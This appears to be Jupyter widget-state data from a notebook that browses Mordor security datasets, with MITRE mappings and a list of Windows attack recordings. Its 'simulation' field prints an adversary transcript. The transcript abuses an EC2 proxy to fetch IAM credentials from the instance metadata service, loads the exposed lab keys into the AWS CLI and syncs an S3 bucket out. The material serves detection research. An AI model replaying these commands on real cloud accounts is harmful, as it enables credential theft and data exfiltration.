"196e627805a4464a983a990be8452b03": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_c2e8f27be0424336930c22fb63a4f884", "IPY_MODEL_12cfb0e793da4862855e96a851dabd07", "IPY_MODEL_3e1b33b35cc84887bd95e11bc00e3933" ], "layout": "IPY_MODEL_45165fcbf8164ce2b7ce062c507c806d" } }, "1999c1cdc50c4520a537eb81bb8b03ca": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "70%" } }, "1b4fec3a153d43ddac2693ee62dc62db": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "1c1c043edd1b412fbc11a3c03575b586": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "100px", "width": "40%" } }, "1caba0145e3b4206bc10722de50e9d46": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "id", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_fa57c2981a014c6aa434fd6e9b32f20e", "value": "SDAWS-200914011940" } }, "1d17f689cfa0422a8cfafb0915fa00e5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "1f357d31eebd4172b65e9acbe9e5d38d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "FloatProgressModel", "state": { "bar_style": "success", "description": "Downloading Mordor metadata files: 100%", "layout": "IPY_MODEL_87031dc2d0f341568fb968c5f6ee1753", "max": 57, "style": "IPY_MODEL_86ca490e74884605857e3b2aa1485f22", "value": 57 } }, "21513f1b43734a47ad633209d05442f1": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "227af9ea3c644405abd5b2f83ca20e06": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "249556214a2d41a9b689a173dd3cc2ce": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "references", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_1d17f689cfa0422a8cfafb0915fa00e5", "value": "['https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3']" } }, "257a823eb6f24fc79a12f02010dd47c3": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "200px", "width": "70%" } }, "27460ceabac04572b3bdae58fd275bc2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "query name", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_5eefece855c3492cb6343159719bd764", "value": "small.aws.collection.ec2_proxy_s3_exfiltration (AWS Cloud Bank Breach S3, SDAWS-200914011940)" } }, "2905573e95634a98bf96b21701a539ba": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_d6d592e91a0849c5889a0f09e3d42baa", "IPY_MODEL_abe73812644a4742bc8292f7a9e1937b" ], "layout": "IPY_MODEL_726eb5a7dd734f75abbe80d9a0683241" } }, "2d186d5ba3304f2baf9b07e8cb9f40f3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "2ff8099083884490912790f4f4ee3424": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_c9e23342af3e4f8881ff245933286e44", "IPY_MODEL_49bca43be6a04bdb9c218a030d2144bf" ], "layout": "IPY_MODEL_c7ce0402538d4bb683f037f4a1f22db8" } }, "31169bba041a4b20919221e4ce7ce8dd": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "32d8d9aebbb3483290926dff1dfea13e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "33716f25ea6743798bfc1c7985b15b35": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_ac45c5eb72044ea7b5ea9972a9689fa4", "IPY_MODEL_60c77bd887e94f1eadfc172d87239b93" ], "layout": "IPY_MODEL_fbd378c0ef2e4dc9be8330bb8120f724" } }, "35454e40c4274824bef1570224e38d97": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "373a0836c6cd467892043018c97957d3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "385886c636fc4a3ebba6d7433bacf137": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "tags", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_21513f1b43734a47ad633209d05442f1", "value": "EC2 Proxy Abuse, S3 Data Exfiltration" } }, "3aeb90923fc448b9ad408592840224dc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_a2e96eefc5114fdca95a990b015031ce", "style": "IPY_MODEL_ed6812b281a444e8b320b86b520a993e" } }, "3b4c62c7679b47a6b0502a43cb3d53b2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "modification_date", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_63a6203566e9421d86229af44063e735", "value": "2020-09-13 00:00:00" } }, "3c83670a67f64f14a315906e595035c2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "3da201ec0e6c4a4488cc7d6e9f5e1054": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "3dd3958361f447be84ab38ea5701f571": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "3e1b33b35cc84887bd95e11bc00e3933": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Filters" }, "children": [ "IPY_MODEL_00f39a99d801432386985bbba8d91d3e" ], "layout": "IPY_MODEL_be7cc59a47014704ac98626c7fd932a7", "selected_index": null } }, "3e641eadea214ac9942ed005f61f2c5e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_18b2b22895544665831e6b9e2448d268", "IPY_MODEL_98e7a335eb6942728df8ad89b9091b3d", "IPY_MODEL_f169ab2db4c64030b2179596d3ee6213" ], "layout": "IPY_MODEL_a45d771601644fea9c9f0391f705d28b" } }, "3e66b46fc13346358e05316f28219477": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "45165fcbf8164ce2b7ce062c507c806d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "1px solid", "margin": "5px", "padding": "10px", "width": "80%" } }, "49bca43be6a04bdb9c218a030d2144bf": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_0d2d30c344e74b6283f5d1461287d534", "style": "IPY_MODEL_ad9dfbe7ba9543358b103f86dc8f59d6", "value": " comma ORs values, '+' ANDs values" } }, "49d94d3dc9a84c1a89356a9e90b8275f": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Download", "layout": "IPY_MODEL_de91f0de57e54aa4a6179c752e52d3ac", "style": "IPY_MODEL_d5ebea2ba6cb4c999c2ca71bdd18a303" } }, "4cba7100a77d4a67a9e30740a047c57d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_fa6daef63a734178baa4e1c093f31cbf", "IPY_MODEL_49d94d3dc9a84c1a89356a9e90b8275f" ], "layout": "IPY_MODEL_707d9649d0cc41f6a76df6f9cde75616" } }, "516c7ff671144ad495b4cf4a7aa53602": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_973b3cc26eb144178fbc3f5cd879acb5", "IPY_MODEL_1caba0145e3b4206bc10722de50e9d46", "IPY_MODEL_bc63213943704f288317b5d00cc19b0a", "IPY_MODEL_55f54dcaf30742e692568466063bb8ab", "IPY_MODEL_678bd81546ab45ebb4d708bc59ec37c3", "IPY_MODEL_e2bfded2a0ad4628a8106cad6144fabc", "IPY_MODEL_cbb5cc87c81a4f90b3fefa8baba81286", "IPY_MODEL_853e8ac9109545b6b0b0212e0a024e2e", "IPY_MODEL_33716f25ea6743798bfc1c7985b15b35", "IPY_MODEL_80595b0b60f5412ebc93246191b6e337", "IPY_MODEL_5b681178e5a0489299a4957ba1a6497b", "IPY_MODEL_5951e34d8aa0481ba5fed0fc7b6f3699", "IPY_MODEL_a70b0021bce34751b70575aa7498a372", "IPY_MODEL_e463e5729fc748d0bab3cf5891f1d76b" ], "layout": "IPY_MODEL_6573400329f84022af769bb793389703" } }, "52b24cb8d1f74e38a17455c6348de176": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "300px", "width": "50%" } }, "558ea780be9242a99605ddc0b175b3f7": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "notebooks", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_bf1a6fa8f4504720860c17624decbf02", "value": "
none" } }, "55f54dcaf30742e692568466063bb8ab": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "creation_date", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_705f73c7e2404583b800026f6f76fb2f", "value": "2020-09-13 00:00:00" } }, "561949ffe1954ada877c9e9cb7185fc6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "300px", "width": "50%" } }, "5951e34d8aa0481ba5fed0fc7b6f3699": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "simulation", "layout": "IPY_MODEL_c1901c134f6f467dba2fad20ada839ea", "style": "IPY_MODEL_aba795964a1040b79314d6a4bda98486", "value": "{'adversary_view': '> curl -s '\n 'http://35.174.154.220/latest/meta-data/iam/security-credentials/ '\n '-H '\n '\"Host:169.254.169.254\" \\n'\n 'MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 '\n '>\\n'\n '\\n'\n '> curl -s '\n 'http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 '\n '-H \"Host:169.254.169.254\"\\n'\n '{\\n'\n '\"Code\" : \"Success\",\\n'\n '\"LastUpdated\" : \"2020-09-14T00:49:26Z\",\\n'\n '\"Type\" : \"AWS-HMAC\",\\n'\n '\"AccessKeyId\" : \"ASIA5FLZVX4OPVKKVBMX\",\\n'\n '\"SecretAccessKey\" : '\n '\"aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\",\\n'\n '\"Token\" : \"TOKEN\",\\n'\n '\"Expiration\" : \"2020-09-14T07:10:27Z\"\\n'\n '}\\n'\n '\\n'\n '> aws configure --profile erratic\\n'\n 'AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX\\n'\n 'AWS Secret Access Key [None]: '\n 'aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03\\n'\n 'Default region name [None]: us-east-1\\n'\n 'Default output format [None]: json\\n'\n '\\n'\n '> echo aws_session_token = \"TOKEN\" >> ~/.aws/credentials \\n'\n '\\n'\n '> aws s3 ls --profile erratic\\n'\n '2020-09-13 20:00:32 '\n 'mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642\\n'\n '2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a\\n'\n '\\n'\n '> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile '\n 'erratic\\n'\n '2020-09-13 20:00:26 89 ring.txt\\n'\n '\\n'\n '> aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile '\n 'erratic\\n'\n '2020-09-13 20:00:26 89 ring.txt\\n'\n '\\n'\n '> aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . '\n '--profile erratic \\n'\n 'download: '\n 's3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to '\n './ring.txt',\n 'environment': 'https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3',\n 'permissions_required': ['user'],\n 'tools': [{'module': 'Exfiltration',\n 'name': 'AWS CLI',\n 'script': 'https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3',\n 'type': 'Cloud Formation Templates'}]}" } }, "5b681178e5a0489299a4957ba1a6497b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "notebooks", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_bc4d326e33d14443a023cc32382e450d", "value": "
none" } }, "5e9884fbe358493aacea24c82b103c61": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "5eefece855c3492cb6343159719bd764": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "5f103a0dddbb430ba59b66d8131eb157": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "small.aws.collection.ec2_proxy_s3_exfiltration", "small.windows.collection.host.msf_record_mic", "small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.host.empire_mimikatz_extract_keys", "small.windows.credential_access.host.empire_mimikatz_logonpasswords", "small.windows.credential_access.host.empire_mimikatz_lsadump_patch", "small.windows.credential_access.host.empire_mimikatz_sam_access", "small.windows.credential_access.host.empire_over_pth_patch_lsass", "small.windows.credential_access.host.empire_powerdump_sam_access", "small.windows.credential_access.host.empire_shell_reg_dump_sam", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_createnetonly", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_ptt", "small.windows.credential_access.host.rdp_interactive_taskmanager_lsass_dump", "small.windows.credential_access.network.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.network.empire_shell_rubeus_asktgt_createnetonly", "small.windows.credential_access.network.empire_shell_rubeus_asktgt_ptt", "small.windows.defense_evasion.host.covenant_installutil", "small.windows.defense_evasion.host.empire_dllinjection_LoadLibrary_CreateRemoteThread", "small.windows.defense_evasion.host.empire_launcher_sct_regsvr32", "small.windows.defense_evasion.host.empire_monologue_netntlm_downgrade", "small.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.defense_evasion.host.empire_psinject_PEinjection", "small.windows.defense_evasion.host.empire_enable_rdp.tar", "small.windows.defense_evasion.host.empire_wdigest_downgrade.tar", "small.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.discovery.host.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.host.empire_find_localadmin_smb_svcctl_OpenSCManager", "small.windows.discovery.host.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.host.empire_shell_net_local_users", "small.windows.discovery.host.empire_shell_net_localgroup_administrators", "small.windows.discovery.host.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.host.empire_shell_samr_EnumDomainUsers", "small.windows.discovery.network.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.network.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.network.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.network.empire_shell_samr_EnumDomainUsers", "small.windows.execution.host.empire_launcher_vbs", "small.windows.lateral_movement.host.covenant_copy_smb_CreateRequest", "small.windows.lateral_movement.host.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.host.covenant_dcom_registerxll", "small.windows.lateral_movement.host.covenant_psremoting_command", "small.windows.lateral_movement.host.covenant_sc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_create_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpwmi_create_dcerpc_wmi", "small.windows.lateral_movement.host.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.host.empire_dcom_shellwindows_stager", "small.windows.lateral_movement.host.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.host.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.host.empire_psremoting_stager", "small.windows.lateral_movement.host.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.host.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.host.empire_wmic_add_user_backdoor", "small.windows.lateral_movement.host.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.lateral_movement.network.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.network.covenant_dcom_registerxll", "small.windows.lateral_movement.network.covenant_psremoting_command", "small.windows.lateral_movement.network.covenant_sc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_create_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpwmi_create_dcerpc_wmi", "small.windows.lateral_movement.network.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.network.empire_dcom_shellwindows_stager", "small.windows.lateral_movement.network.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.network.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.network.empire_psremoting_stager", "small.windows.lateral_movement.network.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.network.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.network.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_elevated_user", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_standard_user", "small.windows.persistence.host.empire_schtasks_creation_execution_elevated_user", "small.windows.persistence.host.empire_schtasks_creation_standard_user", "small.windows.persistence.host.empire_wmi_local_event_subscriptions_elevated_user", "small.windows.privilege_escalation.host.empire_uac_shellapi_fodhelper" ], "description": "Select an item", "index": 0, "layout": "IPY_MODEL_52b24cb8d1f74e38a17455c6348de176", "style": "IPY_MODEL_f5e596a77c8b47998b9dfd0439a51c58" } }, "60c77bd887e94f1eadfc172d87239b93": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Download", "layout": "IPY_MODEL_80a6a1491f3d4eadb10acc6ae946a6ce", "style": "IPY_MODEL_ba1fe8518d564de3b6bc0ab913ed1eaa" } }, "63a6203566e9421d86229af44063e735": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "647f49b51caa47a7acc4adf675dfd47b": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "70%" } }, "6573400329f84022af769bb793389703": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "1px solid", "margin": "5px", "padding": "10px", "width": "80%" } }, "678bd81546ab45ebb4d708bc59ec37c3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "modification_date", "layout": "IPY_MODEL_1999c1cdc50c4520a537eb81bb8b03ca", "style": "IPY_MODEL_15544c32789444f2a5c22624ef1c1a36", "value": "2020-09-13 00:00:00" } }, "7044344294cb4ecdbe044c53779be27a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HTMLModel", "state": { "description": "attacks", "layout": "IPY_MODEL_647f49b51caa47a7acc4adf675dfd47b", "style": "IPY_MODEL_ece2bc63290248a0badfad760907811c", "value": "

Mitre Technique T1078 (sub: 004) : Valid Accounts

Mitre Tactics: TA0001: Initial Access, TA0003: Persistence, TA0004: Privilege Escalation, TA0005: Defense Evasion

Mitre Technique T1530 : Data from Cloud Storage Object

Mitre Tactics: TA0009: Collection" } }, "705f73c7e2404583b800026f6f76fb2f": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "150px" } }, "707792065e3b43c3910a84efa28ab8ce": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "small.aws.collection.ec2_proxy_s3_exfiltration", "small.windows.collection.host.msf_record_mic", "small.windows.credential_access.host.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.host.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.host.empire_mimikatz_extract_keys", "small.windows.credential_access.host.empire_mimikatz_logonpasswords", "small.windows.credential_access.host.empire_mimikatz_lsadump_patch", "small.windows.credential_access.host.empire_mimikatz_sam_access", "small.windows.credential_access.host.empire_over_pth_patch_lsass", "small.windows.credential_access.host.empire_powerdump_sam_access", "small.windows.credential_access.host.empire_shell_reg_dump_sam", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_createnetonly", "small.windows.credential_access.host.empire_shell_rubeus_asktgt_ptt", "small.windows.credential_access.host.rdp_interactive_taskmanager_lsass_dump", "small.windows.credential_access.network.covenant_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_dcsync_dcerpc_drsuapi_DsGetNCChanges", "small.windows.credential_access.network.empire_mimikatz_backupkeys_dcerpc_smb_lsarpc", "small.windows.credential_access.network.empire_shell_rubeus_asktgt_createnetonly", "small.windows.credential_access.network.empire_shell_rubeus_asktgt_ptt", "small.windows.defense_evasion.host.covenant_installutil", "small.windows.defense_evasion.host.empire_dllinjection_LoadLibrary_CreateRemoteThread", "small.windows.defense_evasion.host.empire_launcher_sct_regsvr32", "small.windows.defense_evasion.host.empire_monologue_netntlm_downgrade", "small.windows.defense_evasion.host.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.defense_evasion.host.empire_psinject_PEinjection", "small.windows.defense_evasion.host.empire_enable_rdp.tar", "small.windows.defense_evasion.host.empire_wdigest_downgrade.tar", "small.windows.defense_evasion.network.empire_powerview_ldap_ntsecuritydescriptor", "small.windows.discovery.host.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.host.empire_find_localadmin_smb_svcctl_OpenSCManager", "small.windows.discovery.host.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.host.empire_shell_net_local_users", "small.windows.discovery.host.empire_shell_net_localgroup_administrators", "small.windows.discovery.host.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.host.empire_shell_samr_EnumDomainUsers", "small.windows.discovery.network.covenant_getdomaingroup_ldap_searchrequest_domain_admins", "small.windows.discovery.network.empire_getsession_dcerpc_smb_srvsvc_NetSessEnum", "small.windows.discovery.network.empire_shell_rpc_samr_smb_group_domain_admins_standard_user", "small.windows.discovery.network.empire_shell_samr_EnumDomainUsers", "small.windows.execution.host.empire_launcher_vbs", "small.windows.lateral_movement.host.covenant_copy_smb_CreateRequest", "small.windows.lateral_movement.host.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.host.covenant_dcom_registerxll", "small.windows.lateral_movement.host.covenant_psremoting_command", "small.windows.lateral_movement.host.covenant_sc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_create_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.covenant_sharpwmi_create_dcerpc_wmi", "small.windows.lateral_movement.host.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.host.empire_dcom_shellwindows_stager", "small.windows.lateral_movement.host.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.host.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.host.empire_psremoting_stager", "small.windows.lateral_movement.host.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.host.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.host.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.host.empire_wmic_add_user_backdoor", "small.windows.lateral_movement.host.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.lateral_movement.network.covenant_dcom_executeexcel4macro_allowed", "small.windows.lateral_movement.network.covenant_dcom_registerxll", "small.windows.lateral_movement.network.covenant_psremoting_command", "small.windows.lateral_movement.network.covenant_sc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_create_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_query_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_start_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpsc_stop_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.covenant_sharpwmi_create_dcerpc_wmi", "small.windows.lateral_movement.network.covenant_wmi_remote_event_subscription_ActiveScriptEventConsumers", "small.windows.lateral_movement.network.empire_dcom_shellwindows_stager", "small.windows.lateral_movement.network.empire_msbuild_dcerpc_wmi_smb", "small.windows.lateral_movement.network.empire_psexec_dcerpc_tcp_svcctl", "small.windows.lateral_movement.network.empire_psremoting_stager", "small.windows.lateral_movement.network.empire_shell_dcerpc_smb_service_dll_hijack", "small.windows.lateral_movement.network.empire_smbexec_dcerpc_smb_svcctl", "small.windows.lateral_movement.network.empire_wmi_dcerpc_wmi_IWbemServices_ExecMethod", "small.windows.lateral_movement.network.mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_elevated_user", "small.windows.persistence.host.empire_persistence_registry_modification_run_keys_standard_user", "small.windows.persistence.host.empire_schtasks_creation_execution_elevated_user", "small.windows.persistence.host.empire_schtasks_creation_standard_user", "small.windows.persistence.host.empire_wmi_local_event_subscriptions_elevated_user", "small.windows.privilege_escalation.host.empire_uac_shellapi_fodhelper" ], "description": "Select an item", "index": 0, "layout": "IPY_MODEL_561949ffe1954ada877c9e9cb7185fc6", "style": "IPY_MODEL_cf785e6f037b4e56825395070ea6e151" } }, "707d9649d0cc41f6a76df6f9cde75616": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "70fd3df0081040cb8e665f596911aca0": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "726eb5a7dd734f75abbe80d9a0683241": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "734b47ff6f5b4746a590006e099e471e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_81fe0e98cb814ae6aa47d54c0349b63e", "IPY_MODEL_f37054c182ce4fa699afffa54a49cd35", "IPY_MODEL_c64e723f0df44dab86d4ffde1141aeda" ], "layout": 